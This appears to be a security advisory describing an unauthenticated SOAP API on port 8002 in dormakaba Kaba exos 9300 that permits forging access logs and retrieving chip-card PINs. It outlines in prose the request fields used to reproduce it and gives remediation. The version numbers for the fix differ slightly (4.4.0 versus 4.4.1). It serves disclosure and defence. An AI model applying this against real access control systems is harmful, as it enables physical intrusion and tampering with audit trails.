dormakaba Kaba exos 9300 Unauthenticated SOAP API Vulnerability Allowing Arbitrary Access Log Manipulation and PIN Retrieval

A vulnerability exists in the dormakaba Kaba exos 9300 access control management software, prior to version 4.4.0, that allows unauthorized users to access a SOAP API on port 8002 without authentication. This API can be used to forge access log entries and retrieve two-factor authentication PINs associated with enrolled chip cards. The vulnerability arises from the lack of authentication in the SOAP API, which is used to manage access events and card information.

Impact

Exploitation of this vulnerability allows for unauthorized manipulation of access logs and retrieval of sensitive PIN information, which could be used to bypass security measures and gain unauthorized access to secured areas.

Reproduction

The vulnerability can be reproduced by sending a SOAP request to the exos 9300 server on port 8002. The request must include the identifier of the access manager, the badge number of the chip card, and the event details such as the event ID and log date. Once the request is sent, the server responds with a confirmation that the log entry has been created. This process can also be used to query the PINs of enrolled chip cards by sending a request with the card ID and access manager identifier.

Remediation

Users are advised to update to exos 9300 version 4.4.1 or later, where this vulnerability has been fixed. For versions prior to 4.4.1, manual mitigation steps are available. Consult the dormakaba security advisory page for more details.